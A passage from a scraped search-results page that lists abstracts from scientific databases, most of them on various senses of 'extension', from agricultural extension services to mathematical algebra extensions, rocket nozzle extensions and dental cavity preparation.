customized for any specific segmentation and analysis task. We demonstrate the utility of these classes for segmenting various anatomical structures from 2D medical images. We also demonstrate the effectiveness of JESS by using it to rapidly build a prototype semi-automatic sperm analysis system. The JESS software will be made publicly available in early 2005. 4. Fluorescein-related extensive jaundice. Science.gov (United States) Kalkan, Asim; Turedi, Suleyman; Aydin, Ibrahim 2015-03-01 Fluorescein is a chemical dye frequently used in eye diseases to assess blood flow in the retina, choroid tissue, and iris. Although it has many known adverse effects, it has not previously been reported to lead to jaundice. The purpose of this case report was to emphasize that for patients presenting at the emergency department with jaundice symptoms, it should not be forgotten by emergency physicians that jaundice can develop after fluorescein angiography. Case: A 65-year-old woman presented at the emergency department with extensive jaundice that had developed on her entire body a few hours after fluorescein angiography applied because of vision impairment. The test results for all the diseases considered to cause jaundice were normal,and fluorescein-related jaundice was diagnosed. Conclusion: A detailed anamnesis should be taken when jaundice is seen in patients who have undergone fluorescein angiography, and it should not be forgotten that fluorescein dye is a rare cause of jaundice. 5. Extensive Renovation of Heritage Buildings DEFF Research Database (Denmark) Rasmussen, Torben Valdbjørn; Møller, Eva B.; Buch-Hansen, Thomas Cornelius 2015-01-01 In the debate on whether or not heritage buildings should be included in work to mitigate climate change impacts, it is important to assess the impact of these buildings. Therefore the results of an extensive energy upgrading of a listed complex was studied. Climate change and measures to mitigate...... existing, older and heritage buildings. However, heritage buildings possess heritage values that need to be protected while on the other hand the buildings need to remain part of the attractive building stock, as many of these buildings will otherwise deteriorate. Based on an example, this paper identifies...... feasible energy-upgrading measures for implementation including measures to provide an acceptable indoor climate. The energy savings as well as the reduction of CO2 emissions are calculated. Furthermore, it is discussed how measures can affect the durability of a heritage building, as measures may create... 6. An Expressive Extension of TLC DEFF Research Database (Denmark) Henriksen, Jesper Gulmann 2002-01-01 A temporal logic of causality (TLC) was introduced by Alur, Penczek and Peled in [1]. It is basically a linear time temporal logic interpreted over Mazurkiewicz traces which allows quantification over causal chains. Through this device one can directly formulate causality properties of distributed...... systems. In this paper we consider an extension of TLC by strengthening the chain quantification operators. We show that our logic TLC* adds to the expressive power of TLC. We do so by defining an Ehrenfeucht-Fraïssé game to capture the expressive power of TLC. We then exhibit a property and by means...... of this game prove that the chosen property is not definable in TLC. We then show that the same property is definable in TLC*. We prove in fact the stronger result that TLC* is expressively stronger than TLC exactly when the dependency relation associated with the underlying trace alphabet is not transitive.... 7. Industrial extension, the Oklahoma way Science.gov (United States) Farrell, Edmund J. 1994-03-01 Oklahoma has established a customer-driven industrial extension system. A publicly-chartered, private non-profit corporation, the Oklahoma Alliance for Manufacturing Excellence, Inc. (the Alliance') coordinates the system. The system incorporates principles that Oklahoma manufacturers value: (1) decentralization and local accessibility; (2) coordinated existing resources; (3) comprehensive help; (4) interfirm cooperation; (5) pro-active outreach; (6) self- help and commitment from firms; (7) customer governance; and (8) performance accountability. The Oklahoma system consists of: (1) a network of locally-based broker/agents who work directly with manufacturers to diagnose problems and find appropriate assistance; (2) a group of industry sector specialists who collect and disseminate sector specific technological and market intelligence to the broker/agents and their clients; (3) all the specialized public and private sector resources coordinated by the system; and (4) a customer- driven coordination and evaluation mechanism, the Alliance. 8. Competency Modeling in Extension Education: Integrating an Academic Extension Education Model with an Extension Human Resource Management Model Science.gov (United States) Scheer, Scott D.; Cochran, Graham R.; Harder, Amy; Place, Nick T. 2011-01-01 The purpose of this study was to compare and contrast an academic extension education model with an Extension human resource management model. The academic model of 19 competencies was similar across the 22 competencies of the Extension human resource management model. There were seven unique competencies for the human resource management model.… 9. Extension contact and professional competencies needed by ... African Journals Online (AJOL) Extension contact and professional competencies needed by extension agents in the Central Region of Ghana for effective transfer of fish-processing technologies to small-scale women in fish processing - Provisional Communication. 10. Strengthening Agricultural Research Capacity for Viable Extension ... African Journals Online (AJOL) Strengthening Agricultural Research Capacity for Viable Extension Policies in Nigeria: An Exploration of Ricoeur's Hermeneutic Theory for Analysing Extension Research. ... Progressively more, researchers use hermeneutic philosophy to inform the conduct of interpretive research. Analogy between the philosophical ... 11. Livestock extension programmes participation and impact on ... African Journals Online (AJOL) Livestock extension programmes participation and impact on smallholder cattle productivity in Kwazulu-Natal: A propensity score matching approach. ... The study concludes with some policy implications. Keywords: Agricultural Extension, Cattle production, Impact evaluation, Propensity Score Matching, South Africa. 12. Extensions of cutting problems: setups Directory of Open Access Journals (Sweden) Sebastian Henn 2013-08-01 Full Text Available Even though the body of literature in the area of cutting and packing is growing rapidly, research seems to focus on standard problems in the first place, while practical aspects are less frequently dealt with. This is particularly true for setup processes which arise in industrial cutting processes whenever a new cutting pattern is started (i.e. a pattern is different from its predecessor and the cutting equipment has to be prepared in order to meet the technological requirements of the new pattern. Setups involve the consumption of resources and the loss of production time capacity. Therefore, consequences of this kind must explicitly be taken into account for the planning and control of industrial cutting processes. This results in extensions to traditional models which will be reviewed here. We show how setups can be represented in such models, and we report on the algorithms which have been suggested for the determination of solutions of the respective models. We discuss the value of these approaches and finally point out potential directions of future research. 13. Presentation Extensions of the SOAP Science.gov (United States) Carnright, Robert; Stodden, David; Coggi, John 2009-01-01 A set of extensions of the Satellite Orbit Analysis Program (SOAP) enables simultaneous and/or sequential presentation of information from multiple sources. SOAP is used in the aerospace community as a means of collaborative visualization and analysis of data on planned spacecraft missions. The following definitions of terms also describe the display modalities of SOAP as now extended: In SOAP terminology, View signifies an animated three-dimensional (3D) scene, two-dimensional still image, plot of numerical data, or any other visible display derived from a computational simulation or other data source; a) "Viewport" signifies a rectangular portion of a computer-display window containing a view; b) "Palette" signifies a collection of one or more viewports configured for simultaneous (split-screen) display in the same window; c) "Slide" signifies a palette with a beginning and ending time and an animation time step; and d) "Presentation" signifies a prescribed sequence of slides. For example, multiple 3D views from different locations can be crafted for simultaneous display and combined with numerical plots and other representations of data for both qualitative and quantitative analysis. The resulting sets of views can be temporally sequenced to convey visual impressions of a sequence of events for a planned mission. 14. Logic regression and its extensions. Science.gov (United States) Schwender, Holger; Ruczinski, Ingo 2010-01-01 Logic regression is an adaptive classification and regression procedure, initially developed to reveal interacting single nucleotide polymorphisms (SNPs) in genetic association studies. In general, this approach can be used in any setting with binary predictors, when the interaction of these covariates is of primary interest. Logic regression searches for Boolean (logic) combinations of binary variables that best explain the variability in the outcome variable, and thus, reveals variables and interactions that are associated with the response and/or have predictive capabilities. The logic expressions are embedded in a generalized linear regression framework, and thus, logic regression can handle a variety of outcome types, such as binary responses in case-control studies, numeric responses, and time-to-event data. In this chapter, we provide an introduction to the logic regression methodology, list some applications in public health and medicine, and summarize some of the direct extensions and modifications of logic regression that have been proposed in the literature. Copyright © 2010 Elsevier Inc. All rights reserved. 15. Effectiveness Of Communication Outreach Strategies Of Extension ... African Journals Online (AJOL) Communication is a major component of agricultural extension and extension agents utilize various methods to deliver messages to their clienteles. The paper focused on the effectiveness of communication outreach strategies of extension agents in Imo State, Nigeria. Data for the study was collected with the aid of ... 16. Towards a National Educational Extension Service. Science.gov (United States) Lessinger, Leon M. 1994-01-01 Describes major elements of an extension system for education based on those essential for one in agriculture, as exemplified by the U.S. Department of Agriculture Cooperative Extension Service. Like the agricultural system, an educational extension service would be driven by customer needs, employ county agents to facilitate client/service… 17. User contributions and public extension delivery modes ... African Journals Online (AJOL) The high recurrent costs faced by the public extension service constraint the number of visits farmers receive. This study examined a number of extension communication channels through which farmers received farm management services/information from the public extension agent. The idea was, first, to find out the ... 18. Purdue Extension: Employee Engagement and Leadership Style Science.gov (United States) Abbott, Angela R. 2017-01-01 The purpose of this quantitative study was to assess the Purdue Extension county directors' level of engagement and leadership style and to examine the relationship between these two variables. The study aimed to inform a professional development training program for all Purdue Extension county extension directors. Survey data were collected from… 19. Norm Attaining Arens Extensions on ℓ1 Directory of Open Access Journals (Sweden) Javier Falcó 2014-01-01 Full Text Available We study norm attaining properties of the Arens extensions of multilinear forms defined on Banach spaces. Among other related results, we construct a multilinear form on ℓ1 with the property that only some fixed Arens extensions determined a priori attain their norms. We also study when multilinear forms can be approximated by ones with the property that only some of their Arens extensions attain their norms. 20. Control and Modeling of Extensible Continuum Robots Data.gov (United States) National Aeronautics and Space Administration — The goal of this research is to develop fundamental control theory, dynamic modeling, and control technology for extensible continuum robotic manipulators. These... 1. Strengthening Agricultural Research Capacity for Viable Extension African Journals Online (AJOL) under discussion. It is suggested that, in conjunction with Gadamer's hermeneutic of understanding, Ricoeur's theory of interpretation warrants consideration as a method of textual analysis by extension experts in Nigeria. Key words: Ricoeur Hermeneutics, textual analysis, extension. Introduction. There is increasing interest ... 2. Towards professionalism in agricultural extension: The professional ... African Journals Online (AJOL) Towards professionalism in agricultural extension: The professional registration of Extensionists in South Africa – A dream or a reality? The role of the South African Society of Extensionists in South Africa – A dream or a reality? The role of the South African Society of Agricultural Extension (SASAE) 3. An Effective Aquaculture Extension System from Farmers ... African Journals Online (AJOL) Government and projects extension professionals should support the system through technical training, study tours, publications and networking. Likewise, since educated and well-off farmers in peri-urban areas can access information, government offices should be equipped with well-trained extension personnel and ... 4. Forestry Extension: An Indispensable Service for Sustainable ... African Journals Online (AJOL) It is effective forestry extension that can enlighten and educate the forest communities on the inherent dangers their activities pose to the enviroment.This is the premise on which the challenges facing effective forestry extension delivery in Nigeria and suggested solutions to the highlighted challenges is the focus of this write ... 5. assessment of extension agents' communication methods African Journals Online (AJOL) USER ABSTRACT. The need to improve aquaculture production through enhanced technology transfer necessitated this study to assess extension agents' use of communication methods and its impact on linkage. A structured questionnaire was administered to 44 extension agents who were randomly selected from Lagos State ... 6. Introduction To Natural Resources Management Extension System ... African Journals Online (AJOL) Introduction To Natural Resources Management Extension System (Nrmes); Rethinking In Extension Systems For 21st Century. ... Growing food demands, soil nutrient depletion is occurring in many tropical and subtropical countries, and land degradation and desertification continues to progress in many other countries. 7. CANONICAL EXTENSIONS OF SYMMETRIC LINEAR RELATIONS NARCIS (Netherlands) Sandovici, Adrian; Davidson, KR; Gaspar, D; Stratila, S; Timotin, D; Vasilescu, FH 2006-01-01 The concept of canonical extension of Hermitian operators has been recently introduced by A. Kuzhel. This paper deals with a generalization of this notion to the case of symmetric linear relations. Namely, canonical regular extensions of symmetric linear relations in Hilbert spaces are studied. The 8. 7 CFR 15b.27 - Extension education. Science.gov (United States) 2010-01-01 ..., written scripts, or interpreters. Recipients need not provide individually prescribed devices, readers for... Education § 15b.27 Extension education. (a) General. A recipient to which this subpart applies that provides extension education may not, on the basis of handicap, exclude qualified handicapped persons. A recipient... 9. Creating Teams Increases Extension Educator Productivity Science.gov (United States) Chalker-Scott, Linda; Daniels, Catherine H.; Martini, Nicole 2016-01-01 The Garden Team at Washington State University is a transdisciplinary group of faculty, staff, and students with expertise in applied plant and soil sciences and an interest in Extension education. The team's primary mission is to create current, relevant, and peer-reviewed materials as Extension publications for home gardeners. The average yearly… 10. Extension Sustainability Camp: Design, Implementation, and Evaluation Science.gov (United States) Brain, Roslynn; Upton, Sally; Tingey, Brett 2015-01-01 Sustainability Camps provide an opportunity for Extension educators to be in the forefront of sustainability outreach and to meet the growing demand for sustainability education. This article shares development, implementation, and evaluation of an Extension Sustainability Camp for youth, grades 4-6. Camp impact was measured via daily pre-and… 11. Agricultural extension officers' perceptions of integrated pest ... African Journals Online (AJOL) On the basis of the positive perceptions of the extension officers regarding IPM, the government of Kenya should establish a supportive policy that will enable the extension officers to promote and educate farmers on the various IPM practices. International Journal of Agriculture and Rural Development Vol. 7(2) 2006: 125- ... 12. Effective Use of Facebook for Extension Professionals Science.gov (United States) Mains, Mark; Jenkins-Howard, Brooke; Stephenson, Laura 2013-01-01 As the use of social media increases, Extension is challenged to stay relevant with cliental by using digital tools. This article illustrates how Facebook can be part of Extension's repertoire of methods for communication, program implementation, education, and marketing. This allows professionals to build social networking capacity with… 13. Linkage activities amongst researchers, extension agents, farmers ... African Journals Online (AJOL) This paper examined the research- extension- farmer- input dealer and marketer linkage activities in the North West Province of South Africa. A simple random sampling technique was used to select researchers, extension agents, farmers, agricultural input dealers and marketers. Their responses in linkage activities were ... 14. Communication for Strengthening Agricultural Extension and Rural ... African Journals Online (AJOL) chrischisoni estate sub-sector, which accounts for less than 30% of gross domestic product. The smallholder agricultural sector .... d) extension agents' views on the decentralization process; and e) assess extension workers' access to .... consistency or unanimity of agreement that the gap is real and needs to be closed. From the table,. 15. 10 CFR 905.33 - Extension formula. Science.gov (United States) 2010-01-01 ... 10 Energy 4 2010-01-01 2010-01-01 false Extension formula. 905.33 Section 905.33 Energy DEPARTMENT OF ENERGY ENERGY PLANNING AND MANAGEMENT PROGRAM Power Marketing Initiative § 905.33 Extension... × project-specific percentage × marketable resource determined to be available at the time future resource... 16. agricultural research and extension linkage in ethiopia African Journals Online (AJOL) AUA aimed at strengthening research and extension linkages will differ from country to country depending on historical working relationships between research and extension organisations as well as their organizational structures, responsiveness to the ever- growing challenges and how divergent or convergent their goals are ... 17. Agricultural extension, research, and development for increased ... African Journals Online (AJOL) The challenges of food security and agricultural development in South Africa cannot simply be solved by limiting extension and research development to the public sector. However, if shortcomings arise in the public sector while addressing extension, research and development, the potential involvement of the private sector ... 18. Job satisfaction of extension agents towards innovation ... African Journals Online (AJOL) The study assessed job satisfaction of extension agents towards innovation dissemination to fish farmers in Lagos State, Nigeria. A simple random sampling technique was used to select 44 extension officers from which data were collected. A structured questionnaire consisting of 6 personal characteristics, 23 management ... 19. Beneficiary Perceptions of Gender Specific Extension Delivery ... African Journals Online (AJOL) Women play major roles in agricultural production although only an estimated 5 percent actually benefit from mainstream extension activities. The Gender Specific Extension Delivery Service was instituted to remedy this trend. This study was an attempt to document women beneficiaries' perceptions on the effectiveness of ... 20. Extension Service Delivery Of Agricultural Development ... African Journals Online (AJOL) The study was conducted to assess the extension service delivery within the Agricultural Development Programmes of Southwest Nigeria after the cessation of the World Bank funding between 1996 and 2013. Primary data were collected from 201 extension agents across 50% of the states in the area of study using ... 1. Extension through Partnerships: Research and Education Center Teams with County Extension to Deliver Programs Science.gov (United States) Mullahey, J. Jeffrey 2011-01-01 Budget reductions have severely affected resources available to deliver agriculture and natural resource Extension programs in Florida. University of Florida/Institute of Food and Agricultural Sciences delivers Extension programming through a unique partnership between research and education centers and county Extension. Science-based information… 2. Examining eXtension: Diffusion, Disruption, and Adoption among Iowa State University Extension and Outreach Professionals Science.gov (United States) Taylor, Cayla; Miller, Greg 2016-01-01 As eXtension unveils its new membership model, Iowa State University Extension and Outreach must determine how best to support professionals and clientele using the technology. This article reports on a study that used the diffusion of innovations and disruptive innovation theories to assess Iowa Extension professionals' adoption and perceptions… 3. The Brazilian Experience with Agroecological Extension: A Critical Analysis of Reform in a Pluralistic Extension System Science.gov (United States) Diesel, Vivien; Miná Dias, Marcelo 2016-01-01 Purpose: To analyze the Brazilian experience in designing and implementing a recent extension policy reform based on agroecology, and reflect on its wider theoretical implications for extension reform literature. Design/methodology/approach: Using a critical public analysis we characterize the evolution of Brazilian federal extension policy… 4. Extension versus Bending for Continuum Robots Directory of Open Access Journals (Sweden) George Grimes 2008-11-01 Full Text Available In this paper, we analyze the capabilities of a novel class of continuous-backbone ("continuum" robots. These robots are inspired by biological "trunks, and tentacles". However, the capabilities of established continuum robot designs, which feature controlled bending but not extension, fall short of those of their biological counterparts. In this paper, we argue that the addition of controlled extension provides dual and complementary functionality, and correspondingly enhanced performance, in continuum robots. We present an interval-based analysis to show how the inclusion of controllable extension significantly enhances the workspace and capabilities of continuum robots. 5. Generalized extensions and blocking factors for FITS Science.gov (United States) Grosbol, P.; Harten, R. H.; Greisen, E. W.; Wells, D. C. 1988-06-01 A general design for extending the Flexible Image Transport System (FITS) tape format is proposed. The present design is shown to preserve compatibility with existing FITS tapes and software (including the 'random groups'), while being general enough to permit a wide variety of new extension files to be designed in the future. Rules are given for the blocking of FITS logical records. The rules for the generalized extension of FITS ensure that extensions can be located and decoded by standard routines without interfering with each other. 6. Integrated Composite Rocket Nozzle Extension Project Data.gov (United States) National Aeronautics and Space Administration — ORBITEC proposes to develop and demonstrate an Integrated Composite Rocket Nozzle Extension (ICRNE) for use in rocket thrust chambers. The ICRNE will utilize an... 7. 40 CFR 52.2322 - Extensions. Science.gov (United States) 2010-07-01 ..., by authority delegated under section 188(d) of the Clean Air Act, as amended in 1990, extends for two... PROMULGATION OF IMPLEMENTATION PLANS (CONTINUED) Utah § 52.2322 Extensions. (a) The Administrator, by authority... 8. Fundamentally Flawed: Extension Administrative Practice (Part 1). Science.gov (United States) Patterson, Thomas F., Jr. 1997-01-01 Extension's current administrative techniques are based on the assumptions of classical management from the early 20th century. They are fundamentally flawed and inappropriate for the contemporary workplace. (SK) 9. ERP extension - Supply Chain Management (SCM) OpenAIRE Vasile LUPSE; Ovidiu COSMA 2006-01-01 This article presents an extension of a ERP (Enterprise Resource Planning), more precisely the Supply Chain Management (SCM), together with some personal considerations and contributions of the authors, regarding the presented concepts. 10. Extensive Reading: A Means of Reconciliation. Science.gov (United States) Kutiper, Karen 1983-01-01 Cites research suggesting that extensive reading is as effective as intensive reading in developing general reading ability and is more effective in promoting good attitudes among elementary and secondary school students toward reading. (MM) 11. Bandwidth extension of speech using perceptual criteria CERN Document Server Berisha, Visar; Liss, Julie 2013-01-01 Bandwidth extension of speech is used in the International Telecommunication Union G.729.1 standard in which the narrowband bitstream is combined with quantized high-band parameters. Although this system produces high-quality wideband speech, the additional bits used to represent the high band can be further reduced. In addition to the algorithm used in the G.729.1 standard, bandwidth extension methods based on spectrum prediction have also been proposed. Although these algorithms do not require additional bits, they perform poorly when the correlation between the low and the high band is weak. In this book, two wideband speech coding algorithms that rely on bandwidth extension are developed. The algorithms operate as wrappers around existing narrowband compression schemes. More specifically, in these algorithms, the low band is encoded using an existing toll-quality narrowband system, whereas the high band is generated using the proposed extension techniques. The first method relies only on transmitted high-... 12. UVEAL MELANOMA EXTENSION TO THE OPTIC CHIASM. Science.gov (United States) Abdellatief, Amro; Pulido, Jose S; Bartley, George B; Salomao, Diva R; Quinn, Timothy A 2016-01-01 Case report describing a patient who developed intracranial extension of a uveal melanoma through the optic nerve. We reviewed the patient's medical history and images. A 41-year-old woman who was blind in one eye had a uveal melanoma that extended through the optic nerve into the optic chiasm and involved the hypophysis. The patient then developed metastasis. The patient developed uveal melanoma extension into the optic chiasm through the optic nerve resulting in a visual field defect in the fellow eye. Uveal melanoma extension through the optic nerve is a devastating complication, which occurs anywhere from 0.6% to 3.7% in patients with uveal melanoma. If enucleation of the affected eye is performed, a representative portion of the optic nerve should be excised to decrease the risk of extension. Patients with phthisical eyes should undergo appropriate imaging techniques to prevent a missed diagnosis of optic nerve involvement. 13. 76 FR 79665 - Agency Information Collection Extension Science.gov (United States) 2011-12-22 ... 1995. The information collection package requests a three-year extension of Industrial Relations... request contains: (1) OMB No. 1910-0600; (2) Information Collection Request Title: Industrial Relations... 14. ERP extension - Supply Chain Management (SCM Directory of Open Access Journals (Sweden) Vasile LUPSE 2006-01-01 Full Text Available This article presents an extension of a ERP (Enterprise Resource Planning, more precisely the Supply Chain Management (SCM, together with some personal considerations and contributions of the authors, regarding the presented concepts. 15. Offshore extension of Gomati river, Dwarka Digital Repository Service at National Institute of Oceanography (India) Vora, K.H.; Naik, D.K.; Ganesan, P.; Moraes, C. information. Attempts have been made to identify the submerged extension of Gomati River by diving inspection and based on the results obtained such as findings like stone and iron anchors, circular bastions, etc. While many features reported earlier... 16. Economic modeling for life extension decision making International Nuclear Information System (INIS) Farber, M.A.; Harrison, D.L.; Carlson, D.D. 1986-01-01 This paper presents a methodology for the economic and financial analysis of nuclear plant life extension under uncertainty and demonstrates its use in a case analysis. While the economic and financial evaluation of life extension does not require new analytical tools, such studies should be based on the following three premises. First, the methodology should examine effects at the level of the company or utility system, because the most important economic implications of life extension relate to the altered generation system expansion plan. Second, it should focus on the implications of uncertainty in order to understand the factors that most affect life extension benefits and identify risk management efforts. Third, the methodology should address multiple objectives, at a minimum, both economic and financial objectives 17. Integrated Composite Rocket Nozzle Extension, Phase I Data.gov (United States) National Aeronautics and Space Administration — ORBITEC proposes to develop and demonstrate an Integrated Composite Rocket Nozzle Extension (ICRNE) for use in rocket thrust chambers. The ICRNE will utilize an... 18. An Overview of English Extensive Reading Program OpenAIRE Fujikami , Ryuji; Nagasaka, Tatsuhiko Paul; Yoshino, Yasuko; Jones, Andrew 2013-01-01 In this paper, we review the changes in attitude toward reading English shown by students as a result of participating in an extensive reading program. The top classes for each department studying Integrated English in the first semester of 2012 were given the challenge of reading extensively in English, using simple readers from leading publishers. Before and after the program, the non-English majors were asked to answer a questionnaire designed to reveal their attitudes toward reading Engli... 19. Extension for prevention: is it relevant today? Science.gov (United States) Osborne, J W; Summitt, J B 1998-08-01 Extension for prevention has been an integral part of dentistry for over 100 years. Because this concept advocated the removal of sound tooth structure, it was not totally accepted at the turn of the century. The advent of the gold casting catapulted extension for prevention into general acceptance. In 1883, Webb presented a concept of "prevention of extension of decay". This concept advocated a proximal cavity preparation extending toward the buccal and lingual aspects of the tooth so that contact with adjacent teeth would not be at the margins. The separation of the margins, along with proper restoration contours, was thought to promote natural cleansing of the embrasures with saliva and fluids in the diet. GV Black's 1891 idea of "extension for prevention" was to provide extension of the preparation to the facial and lingual line angles in order to bring about "self-cleansing" margins via food excursion. Black's concept also included extending preparations through fissures to allow cavosurface margins to be on non-fissured enamel. Black integrated the extension of the proximal margins with his concept of an occlusal isthmus for a Class II amalgam preparation one-third the faciolingual width of the occlusal surface. Challenges to this concept of extension for prevention were immediate; and, by the 1950's, narrower, more conservative preparations were seen by a few as being more effective in preserving teeth. Not only occlusal width was reassessed, but the need to routinely extend proximal margins to the buccal and lingual line angles was also questioned. By the mid-1960's and early 1970's a more conservative approach to amalgam preparation was advocated and was being taught in some dental schools. Today, a standardized outline form should not be used or taught as a principle of cavity preparation. In areas where fissure caries has necessitated a preparation extending into dentin, a composite resin or dental amalgam restoration should be placed, and a fissure 20. Upper Stage Engine Composite Nozzle Extensions Science.gov (United States) Valentine, Peter G.; Allen, Lee R.; Gradl, Paul R.; Greene, Sandra E.; Sullivan, Brian J.; Weller, Leslie J.; Koenig, John R.; Cuneo, Jacques C.; Thompson, James; Brown, Aaron; 2015-01-01 Carbon-carbon (C-C) composite nozzle extensions are of interest for use on a variety of launch vehicle upper stage engines and in-space propulsion systems. The C-C nozzle extension technology and test capabilities being developed are intended to support National Aeronautics and Space Administration (NASA) and United States Air Force (USAF) requirements, as well as broader industry needs. Recent and on-going efforts at the Marshall Space Flight Center (MSFC) are aimed at both (a) further developing the technology and databases for nozzle extensions fabricated from specific CC materials, and (b) developing and demonstrating low-cost capabilities for testing composite nozzle extensions. At present, materials development work is concentrating on developing a database for lyocell-based C-C that can be used for upper stage engine nozzle extension design, modeling, and analysis efforts. Lyocell-based C-C behaves in a manner similar to rayon-based CC, but does not have the environmental issues associated with the use of rayon. Future work will also further investigate technology and database gaps and needs for more-established polyacrylonitrile- (PAN-) based C-C's. As a low-cost means of being able to rapidly test and screen nozzle extension materials and structures, MSFC has recently established and demonstrated a test rig at MSFC's Test Stand (TS) 115 for testing subscale nozzle extensions with 3.5-inch inside diameters at the attachment plane. Test durations of up to 120 seconds have been demonstrated using oxygen/hydrogen propellants. Other propellant combinations, including the use of hydrocarbon fuels, can be used if desired. Another test capability being developed will allow the testing of larger nozzle extensions (13.5- inch inside diameters at the attachment plane) in environments more similar to those of actual oxygen/hydrogen upper stage engines. Two C-C nozzle extensions (one lyocell-based, one PAN-based) have been fabricated for testing with the larger 1. How to make agricultural extension demand-driven?: The case of India's agricultural extension policy OpenAIRE Birner, Regina; Anderson, Jock R. 2007-01-01 "Many countries have recognized the need to revive agricultural advisory or extension services (the terms are used interchangeably here) as a means of using agriculture as an engine of pro-poor growth; reaching marginalized, poor, and female farmers; and addressing new challenges, such as environmental degradation and climate change. In spite of ample experience with extension reform worldwide, identifying the reform options most likely to make extension more demand-driven remains a major cha... 2. abc: An extensible AspectJ compiler DEFF Research Database (Denmark) Avgustinov, Pavel; Christensen, Aske Simon; Hendren, Laurie 2005-01-01 Research in the design of aspect-oriented programming languages requires a workbench that facilitates easy experimentation with new language features and implementation techniques. In particular, new features for AspectJ have been proposed that require extensions in many dimensions: syntax, type...... checking and code generation, as well as data flow and control flow analyses. The AspectBench Compiler (abc) is an implementation of such a workbench. The base version of abc implements the full AspectJ language. Its frontend is built, using the Polyglot framework, as a modular extension of the Java...... language. The use of Polyglot gives flexibility of syntax and type checking. The backend is built using the Soot framework, to give modular code generation and analyses. In this paper, we outline the design of abc, focusing mostly on how the design supports extensibility. We then provide a general overview... 3. Supersymmetric extension of the Snyder algebra Energy Technology Data Exchange (ETDEWEB) Gouba, L., E-mail: [email protected] [Abdus Salam International Centre for Theoretical Physics (ICTP), Strada Costiera 11, 34014 Trieste (Italy); Stern, A., E-mail: [email protected] [Dept. of Physics and Astronomy, Univ. of Alabama, Tuscaloosa, Al 35487 (United States) 2012-04-11 We obtain a minimal supersymmetric extension of the Snyder algebra and study its representations. The construction differs from the general approach given in Hatsuda and Siegel ( (arXiv:hep-th/0311002)) and does not utilize super-de Sitter groups. The spectra of the position operators are discrete, implying a lattice description of space, and the lattice is compatible with supersymmetry transformations. -- Highlights: Black-Right-Pointing-Pointer A new supersymmetric extension of the Snyder algebra is constructed. Black-Right-Pointing-Pointer The extension is minimal and the construction does not involve supersymmetric de Sitter algebras. Black-Right-Pointing-Pointer An involution is defined for the system and discrete representations are constructed. Black-Right-Pointing-Pointer The representations imply a spatial lattice and the lattice spacing is half that of the bosonic case. Black-Right-Pointing-Pointer A differential operator representation is given for fields on super-momentum space. 4. Timeability in Extensive-Form Games DEFF Research Database (Denmark) Jakobsen, Sune K.; Sørensen, Troels Bjerre; Conitzer, Vincent 2016-01-01 Extensive-form games constitute the standard representation scheme for games with a temporal component. But do all extensive-form games correspond to protocols that we can implement in the real world? We often rule out games with imperfect recall, which prescribe that an agent forget something...... that she knew before. In this paper, we show that even some games with perfect recall can be problematic to implement. Specifically, we show that if the agents have a sense of time passing (say, access to a clock), then some extensive-form games can no longer be implemented; no matter how we attempt...... to time the game, some information will leak to the agents that they are not supposed to have. We say such a game is not exactly timeable. We provide easy-to-check necessary and sufficient conditions for a game to be exactly timeable. Most of the technical depth of the paper concerns how to approximately... 5. Symmetric Functional Model for Extensions of Hermitian CERN Document Server Ryzhov, V 2006-01-01 This paper offers the functional model of a class of non-selfadjoint extensions of a Hermitian operator with equal deficiency indices. The explicit form of dilation of a dissipative extension is offered and the symmetric form of Sz.Nagy-Foia\\c{s} model as developed by B.~Pavlov is constructed. A variant of functional model for a general non-selfadjoint non-dissipative extension is formulated. We illustrate the theory by two examples: singular perturbations of the Laplace operator in~$L_2(\\Real^3)$ by a finite number of point interactions, and the Schr\\"odinger operator on the half axis~$(0, \\infty)$ in the Weyl limit circle case at infinity. 6. Bayesian optimization for computationally extensive probability distributions. Science.gov (United States) Tamura, Ryo; Hukushima, Koji 2018-01-01 An efficient method for finding a better maximizer of computationally extensive probability distributions is proposed on the basis of a Bayesian optimization technique. A key idea of the proposed method is to use extreme values of acquisition functions by Gaussian processes for the next training phase, which should be located near a local maximum or a global maximum of the probability distribution. Our Bayesian optimization technique is applied to the posterior distribution in the effective physical model estimation, which is a computationally extensive probability distribution. Even when the number of sampling points on the posterior distributions is fixed to be small, the Bayesian optimization provides a better maximizer of the posterior distributions in comparison to those by the random search method, the steepest descent method, or the Monte Carlo method. Furthermore, the Bayesian optimization improves the results efficiently by combining the steepest descent method and thus it is a powerful tool to search for a better maximizer of computationally extensive probability distributions. 7. A novel decision diagrams extension method International Nuclear Information System (INIS) Li, Shumin; Si, Shubin; Dui, Hongyan; Cai, Zhiqiang; Sun, Shudong 2014-01-01 Binary decision diagram (BDD) is a graph-based representation of Boolean functions. It is a directed acyclic graph (DAG) based on Shannon's decomposition. Multi-state multi-valued decision diagram (MMDD) is a natural extension of BDD for the symbolic representation and manipulation of the multi-valued logic functions. This paper proposes a decision diagram extension method based on original BDD/MMDD while the scale of a reliability system is extended. Following a discussion of decomposition and physical meaning of BDD and MMDD, the modeling method of BDD/MMDD based on original BDD/MMDD is introduced. Three case studies are implemented to demonstrate the presented methods. Compared with traditional BDD and MMDD generation methods, the decision diagrams extension method is more computationally efficient as shown through the running time 8. On Central Extensions of Associative Dialgebras Science.gov (United States) Rakhimov, Isamiddin S. 2016-03-01 The concept of central extensions plays an important in constructing extensions of algebras. This technique has been successfully used in the classification problem of certain classes of algebras. In 1978 Skjelbred and Sund reduced the classification of nilpotent Lie algebras in a given dimension to the study of orbits under the action of automorphism group on the space of second degree cohomology of a smaller Lie algebra with coefficients in a trivial module. Then W. de Graaf applied the Skjelbred and Sund method to the classification problem of low-dimensional nilpotent Lie and associative algebras over some fields. The main purpose of this note is to establish elementary properties of central extensions of associative dialgebras and apply the above mentioned method to the classification of low dimensional nilpotent associative dialgebras. 9. Prospective of the agricultural extension in Colombia International Nuclear Information System (INIS) David Hinestrosa, A. 1998-01-01 The situation of the agricultural extension is described in next twenty years, together with the regional programs of investigation and technology transfer, based in the rational use of the natural resources, the exploitation of markets, the former evaluation before and the expert systems. It proves the dynamic participation of producing leaders and their operation inside an outline of decentralization, privatization, sustainability, competitiveness, justness and invigoration and rural signification. It is supposed that the extension rural functional, bound to the investigation processes, transfer, development, technological development and markets. Institutionally it is expected that the extension is a service of regional and private character with an opportune and enough assignment of resources for the improvement of the quality of the rural population's life 10. Extensive keloidal healing of pemphigus vulgaris Directory of Open Access Journals (Sweden) Khanna Neena 1997-01-01 Full Text Available Bullae of pemphigus vulgaris heal without scarring. We here report a patient of pemphigus vulgaris whose lesions healed with a one-month history of extensive flaccid bullae and uninfected erosions on the trunk and extremities along with superficial erosions in the oral mucosa. The clinical suspicion of pemphigus 